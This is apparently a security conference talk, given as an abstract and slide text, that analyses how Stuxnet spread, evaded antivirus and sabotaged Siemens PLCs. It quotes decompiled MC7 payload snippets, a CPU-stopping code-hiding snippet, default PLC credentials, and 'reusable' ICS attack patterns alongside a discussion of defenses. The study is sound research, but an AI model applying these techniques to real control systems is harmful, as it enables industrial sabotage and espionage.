The talk will show you the techical details of Stuxnet in their full glory and make you appreciate this work of engineering more. Based on a code-level analysis of the Stuxnet PLC payload, the presentation will explain techniques therein that can be used for industrial espionage and sabotage by copycat attackers against competitor's production facilities. Currently recommended defenses, their shortcomings and alternative approaches will also be discussed. Bio: Felix 'FX' Lindner is founder and technical lead of the Recurity Labs GmbH consulting and research team. He is also the leader of the Phenoelit group and loves to hack pretty much everything with a CPU and some communication, preferably networked. He looks back at 15+ years of (legal) hacking with only a couple Cisco IOS and SAP remote exploits, tools for hacking HP printers and protocol attacks lining the road.

1. Targeted Industrial Control
Process Attacks –
Lessons from Stuxnet
Felix ‘FX’ Lindner

2. About
 Founder and technical lead of
Recurity Labs GmbH
 Over 20 years within the computer
industry
 Specialized in attack methodologies and
techniques
 Published first exploits against Cisco IOS
and RIM BlackBerry
 Reverse Engineer by heart

3. Agenda
 Goals of attacks on ICS
 Standard attack patterns
 Technical review of Stuxnet
 Stuxnet prerequisites
 Reusable techniques and patterns
 Current defense strategies
 Alternative defense strategies

4. Goals of ICS Attacks
 ICS attacks that where documented:
 Demonstration purposes
 Power grid
 Chemical industry
 Rail Road management
 Detonating a Trans-Siberian natural gas
pipeline (disputed)
 Delaying a Uranium enrichment program
suspected to be used for nuclear weapons

5. Goals of ICS Attacks

6. Goals of ICS Attacks
 Commonly suspected goals in the future:
 Harming the competition
 Delaying production of competing vendor
 Primarily aimed at Just-in-Time suppliers
 Blackmailing ICS owners
 Similar to documented cases of network blackmail,
e.g. City of San Francisco vs. Terry Childs
 Industrial espionage
 Extraction of ICS programming in order to reverse
engineer recipes and algorithms

7. Challenges of ICS Security
Topic Office IT Control Systems
Availability Planned downtimes 24 x 7 x 365 x forever
Anti-Virus Widely used Uncommon / impossible
Lifetime 3-5 years Up to 20 years
Outsourcing Common Becomes common
Software patching Regular, scheduled Slow, vendor specific
Change management Common Rare
Real-time performance Best effort Critical (safety, process)
Security awareness Good Poor (only physical)
Security testing + audits Regular, scheduled None
Physical security Difficult Good if local
Hard if remote
Time / Log correlation Common Often ignored

9. STANDARD ATTACK PATTERNS

10. Internal Attack Patterns
 Direct manipulation through means of
subverted / bribed / disgruntled employees
 Removal of control system source codes from
site
 Configuration of various access restrictions using
passwords not communicated
 Compromise of upstream management
systems
 Preferred method for people without ICS
knowledge
 SAP Plant Management and similar homegrown
tools with no or very little access controls

11. External Attack Patterns
 Pre-compromise of production
components
 Logic bombs or intentional vulnerabilities in
components acquired by the victim
 Recommending or providing software with
“side effects” to suppliers
 Especially well-suited for expensive software
components
 Method occasionally used within the network
community

12. External Attack Patterns

13. External Attack Patterns (cont.)
1. Compromise workstation computer in
office network of target
2. Compromise server with control systems
connection within target office network
3. Establish Man-in-the-Middle point of
control between operator and ICS
network
4. Modify control system

14. The State of the Art in 2005

15. Evolvement of Standard Patterns
 Most ICS environments used to be equipment
vendor specific
 In some industries, the production process is
completely dependent on the vendors
 Solutions are homogeneous inside heterogeneous
outside of a particular process
 The landscape changes rapidly
 Component based procurement standardizes the
production equipment
 Semi-standardized protocols are used to improve
interoperability
 Wireless protocols get introduced to improve flexibility

16. A TECHNICAL REVIEW OF STUXNET

17. Features of Stuxnet
 Multiple spreading mechanisms:
 CVE-2010-2568 Windows LNK Vulnerability local code
execution
 CVE-2010-3888 Windows Task Scheduler local privilege
escalation
 CVE-2010-2743 Windows Keyboard Layout local privilege
escalation
 CVE-2010-2729 Windows Print Spooler Service remote code
execution
 CVE-2008-4250 Windows Server Service RPC handling remote
code execution
 Self-copying to remote network shares
 Self-copying to remote Siemens WinCC servers
 Infection of Siemens STEP7 project files for automatic launch
upon load

18. Features of Stuxnet (2)
 Peer-to-peer updating mechanism in LANs
 Contacting two predefined C&C (command and
control) servers
 Windows rootkit driver covering all Windows
versions since 2000
 Driver file is signed with valid Code Signing certificate
 Circumvention and corruption of 10 different client
security products
 Special treatment for 3 additional ones
 DLL loading routine that fools behavior based
HIDS detection mechanisms

19. Features of Stuxnet (3)
 Fingerprinting an industrial control process
through documented and undocumented
data structures in programmable logic
controllers (PLCs)
 Backdoors all instances of Siemens WinCC
and STEP7 through patching it’s
communication DLL in order to hide its
presence on the PLC
 Virtualizes the PLC on the PLC itself, in order
to modify input and output controls without
the legitimate code on the PLC knowing

20. CVE-2010-2568: LNK
 Uses a special feature of .LNK files
 Explorer needs the icon of the target of the LNK
file in order to render it
 LNK uses “dynamic icons” when pointing to a
control panel entry
 Dynamic icons use an alternative handling where
Explorer.exe will call the LoadLibrary API on the
destination
 LoadLibrary causes the DLL’s DllMain function to
be executed during load
  100% reliable code execution within the context
of the user’s Explorer.exe

21. CVE-2010-3888: Task Scheduler
 Uses CRC32 compensation attack to exploit design flaw in
Task Scheduler
 When creating a scheduled task, the scheduler creates an
XML file for it
 The XML file contains the user the task is executed under
 The XML file is writable to the user creating the task
 Scheduler runs a CRC32 on it and stores the checksum in the
registry
 When the execution time arrives, the CRC32 is validated against
the file
 Stuxnet modifies the user context of the scheduled task and
performs a CRC32 compensation
  100% reliable code execution as LocalSystem on Windows
Vista and above

22. CVE-2010-2743: Keyboard Layout
 Windows XP and lower allows keyboard layouts to
be loaded from anywhere
 A (not validated) index is loaded from the layout
file in Kernel mode and used as an index to a
function pointer table with 3 entries
 Exploit scans the memory past the function pointer
table for DWORDs that are suitable memory
addresses in userland
 When one is found (<0x80000000), allocates memory
there and triggers the vulnerability
  100% reliable code execution as Kernel on
Windows XP and below

23. CVE-2010-2729: Print Spooler
 Enumerates printer spool shares on the network,
connects as Guest account
 Print job requests to print an EXE and MOF file,
requesting to print to file in %SYSTEM32%
 When printing for Guest, spooler does not
impersonate the remote user but runs as System, so
writing to %SYSTEM32% is allowed
 MOF files are compiled scripts that are placed below
%SYSTEM32%
 Windows monitors the creation and executes the MOF
file’s instructions, running the EXE file
  100% reliable remote code execution as System

24. CVE-2008-4250: Server Service
 Known vulnerability, found being exploited in the wild
by W32/Gimmiv.A
 Interesting to note: Gimmiv.A reports installed security
products back to the C&C server
 Exploits a vulnerability in the RPC path
canonicalization within the remote service
 Patched since 2008 (MS08-067)
 Actually turns out to be a sister vulnerability to MS06-040
 Gains code execution as System
 Widely used exploit in the Metasploit Framework,
including a large number of target Windows versions
and circumvention of DEP on Windows XP and 2003
  Fair chance remote code execution as System

25. Special DLL Loading
 Host IDS behavior monitoring usually
looks at LoadLibrary API calls
 Stuxnet hooks file handling routines in
NTDLL.DLL in order redirect them into
memory areas when special filenames are
encountered
 When Stuxnet uses LoadLibrary, the
special filenames are invalid on the file
system, so HIDS will ignore the call

26. Corrupting the Watchers
Security Software Infected Process
KAV v1 to v7 LSASS.EXE
KAV v8 to v9 KAV Process
McAfee Winlogon.exe
AntiVir LSASS.EXE
BitDefender LSASS.EXE
ETrust v5 to v6 (fail)
ETrust (Other) LSASS.EXE
F-Secure LSASS.EXE
Symantec LSASS.EXE
ESET NOD32 LSASS.EXE
Trend PC Cillin Trend Process

27. Siemens STEP7 Project Infection
 Stuxnet patches the STEP7 project file handling
routines to modify any project opened in the
development or management IDE
 Ignores projects older than 3.5 years
 Ignores projects that appear to be examples
 A specific DLL is placed in the directory “hOmSave7”
of the STEP7 project
 STEP7 specific data in “Apilogtypes” is modified that
causes the DLL from “hOmSave7” to be loaded when
the project file is opened
 The DLL is searched for in %SYSTEM32% and the STEP7
directories first, but when not found is loaded afterwards
from the project’s directory

28. Siemens STEP7 Project Infection (2)
 Similar to STEP7 project infections, Stuxnet
also infects MCP files, used by Siemens
WinCC
 WinCC databases are accessed through a
hardcoded username/password combination for
an administrative user that cannot be changed
 Stuxnet uses remote SQL commands to transfer
itself to the server and execute there
 Project files (even locally) are infected with
itself and a cabinet file in “GracScc_tlg7.sav”
 Such projects, if loaded into a WinCC server
manually, may execute Stuxnet as well

29. Siemens PLC Infection
 On Windows PCs with Siemens PLC software, the
DLL “s7otbxdx.dll” is replaced by a wrapper
 The original version is kept for functionality
 The wrapper ensures that:
 When writing to the PLC, the Stuxnet PLC payload is
added in transit
 When reading from the PLC, the Stuxnet PLC
payload is removed and hence hidden from view
 An additional thread runs, monitoring the PLC and
verifying target properties
 A second additional thread controls a Data Block on
the PLC, remotely managing its behavior

30. Siemens PLC Infection (2)
 Before infecting any PLC, the injected code
on the Windows PC verifies properties
 PLC CPU type 6ES7-417 or 6ES7-315-2
 CP 342-5 Profibus interface module is present
 At least 33 devices with Profibus identification
number 0x7050 or 0x9500 are present
 Identification numbers are assigned globally unique by
vendors and Profinet International, comparable to IANA
 The devices are Variable Frequency Drives (VFDs)
from Fararo Paya (Iran), and Vacon (Finland)

31. Stuxnet MC7 Payload
 Three payloads are delivered with Stuxnet
 Two almost identical payloads for 315-2 CPUs
 Called Block A and B by Symantec
 One larger payload for 417 CPUs
 Called Block C by Symantec
 Replacement of DP_RECV
 DP_RECV is responsible for the processing of received Profibus
messages on the PLC
 Original Function Code is moved and a malicious replacement is
embedded
 Organizational Block (OB) 1 (cyclic execution) is patched with
call to Stuxnet MC7 payload
 OB35 (timed execution) is patched with call to Stuxnet MC7
payload (watchdog function)

32. Binary Comparison of Block A and B

33. Stuxnet MC7 Payload (2)
 Block A/B implement a state machine
1. Record frames via DP_RECV and monitor values of the
VFD, until enough events are recorded
2. Wait 2 hours
3. Send bursts of Profibus frames to the VFDs (Phase I)
 145 or 127 frames (Vacon VFDs)
 34 or 32 frames (Fararo Paya VFDs)
4. Send bursts (Phase II)
 2 or 36 frames (Vacon VFDs)
 23 or 27 (Fararo Paya VFDs)
5. Reset internal values and reinitialize internal structures
 State 0 is the global error handler.

34. Stuxnet MC7 Payload Code
ADD_AC: // CODE XREF: S7_LV+94p
OPN DB888
L DBW10h // word 888.16
L W#16#3 // word 3
<I // ACCU2 is less than ACCU1
// 3 > 888.16
JC loc_2840 // jump if RLO=1 (DW888.16 < 3)
// (do not jump if DW888.16 is 3 or more)
TAK // exchange ACCU1 and ACCU2
L W#16#4 // ACCU1 = 4
>I // ACCU2 is greater than ACCU1
// 4 < 888.16
JC loc_2840 // jump if RLO=1 (DW888.16 > 4 )
// (do not jump if DW888.16 is 4 or less)
L DW#16#0DEADF007h
PUSH // copy ACCU1 into ACCU2
BE
loc_2840: // CODE XREF: ADD_AC+Ej
// ADD_AC+1Aj
L DW#16#0
PUSH // copy ACCU1 into ACCU2
BE

35. Timing of the MC7 Payload
 Recording takes place for 13 days
 Wait 2 hours (fixed)
 Pause after first burst is 27 days
 Pause after second burst is 27 days
  67 days for one cycle of attack
 Wearing out was the goal, not destruction
 The product of the attacked process was the
target, not the production equipment

36. PLC Virtualization / Decoupling
 PLCs, including Siemens S7, execute in cycles
 Read all input signals and set input table
 Execute OB1
 Write all output Bits to output table and generate signals
 Stuxnet disables the automatic update of the Process
Image Input and Output Table
 Essentially decoupling the entire PLC from its sensor
array, virtualizing it
 Allows the Stuxnet payload to modify input and output Bits
(corresponding to signals) so the original code doesn’t
notice any changes
  No explicit operator spoofing required! This method
may even fool people manually debugging the PLC.

37. PLC Input / Output Decoupling
L LW0
BLD +7
= L 14h.0
L B#16#0
T LB15h
UC SFC1Ah // Update Process Image Input Table
JU loc_24
(arg) P# L 15h.0
(arg) P# L 0.0
(arg) P# L 0.0
loc_24:
BLD +8
BLD +7
= L 14h.0
L B#16#0
T LB15h
UC SFC1Bh // Update Process Image Ouput Table
JU loc_46
(arg) P# L 15h.0
(arg) P# L 0.0
(arg) P# L 0.0
loc_46:
BLD +8
T LW0

38. BLD: A Trick Not Used
 STEP7 engineers frequently use a simple trick to hide code
 The BLD instruction is used as a marker around blocks of
code
 The instruction has no effect on the PLC, but is interpreted by
the Siemens editors. Known combinations are:
 BLD 1 / 2 (FC with parameters)
 BLD 3 / 4 (FB with parameters)
 BLD 7 / 8
 BLD 14 / 15 (FC without parameters)
 BLD 103 / 104
 BLD 130 / 131 / 132 / 133 / 255
 The STUXNET code does not make use of this trick
 It actually keeps the original BLD instructions, wasting space
and simplifying analysis using Siemens tools

39. BLD Hiding
BLD +7
A "Always ON" // When being nasty, use this snippet
JC Run
UC SFC 46 // Stops the CPU
Run: NOP 0
... your code
... CC or UC of your FC's
BLD +8
 Call SFC46

40. REUSABLE TECHNIQUES AND PATTERNS

41. How Much Was Required?
Attack Capability Required for Targeted Attack?
CVE-2010-2568 LNK No
CVE-2010-3888 Task Scheduler No
CVE-2010-2743 Keyboard Layout No
CVE-2010-2729 Print Spooler No
CVE-2008-4250 Server Service RPC No
Self-copying to network share No
Peer-to-peer updating No
C&C Servers No
Windows rootkit & certificates No
10 AV product circumventions No
Behavioral detection evasion No

42. How Much Was Required?
Attack Capability Required for Targeted Attack?
Self-copying to WinCC Optional
STEP7 project file infection Yes
ICS process fingerprinting Yes
STEP7 DLL Backdoor Optional
PLC Virtualization Yes

43. Relevant Techniques
 Most of Stuxnet’s functionality is spreading,
survival and persistence oriented
 The measures taken are extreme
 Targeted attacks on an industrial process only
need a few key technologies
 If the infection can be accomplished by human
means, only the PLC payload stays relevant
 Stuxnet demonstrates how it is done
 There is still significant room for advancements,
considering the complexity of Siemens S7
 Similar attacks are very likely to be possible with any
other PLC vendor’s equipment

44. Only In Siemens-Land
 Dillon Beresford showed another way at
BlackHat USA 2011:
 Username: basisk
 Password: basisk
 Compromised OS
below the MC7 layer
is obviously a game
over scenario for any
security within the
PLC network.

45. CURRENT AND FUTURE DEFENSES

46. Current Defenses
 Siemens still postulates it’s the customer’s job to secure its
automation process
 Code execution upon STEP7 project loading not considered a
vulnerability. No fix.
 Code execution through fixed passwords on WinCC servers not
fixed. The password is publicly known since 2008.
 At least the fixed username and password in PLC OS is
supposedly removed since 2009
 Air gaps? Don’t help, don’t exist.
 Infected consultants and service engineers
 Process performance dashboards for management
 Agile production environments in supplier fabs
 Virus scanners?
 Have not protected anything since 1970.

47. Future Defenses
 Frequent reprogramming of the entire automation
environment
 Proposed by process engineers
 May actually be the best option today
 Langner Controller Integrity Checker (CIC)
 Developed as response to Stuxnet
 Promising first attempt on solving some of the problems
 Evasion obviously possible, as it suffers from the detection
paradigm (AV software) problem
 Siemens specific, doesn’t help with other automation
environments
 Both don’t help when the underlying OS is infected

48. Future Defenses
 Future defenses can only get developed with a better
understanding of the offense
 Stuxnet targets a very specific environment
 Currently flourishing research is completely utility centric
(power, water, waste, railway)
 Industrial Control Systems are extremely environment
specific by nature
 The best protection is to evaluate your own
environment’s vulnerability
 Based on a solid threat model, developed around your
business and your likely adversaries
 The only approach that has been shown to work in other
emerging threat areas before

49. Thank You!
Felix ´FX´ Lindner
Head
fx@recurity-labs.com
Recurity Labs GmbH, Berlin, Germany
http://www.recurity-labs.com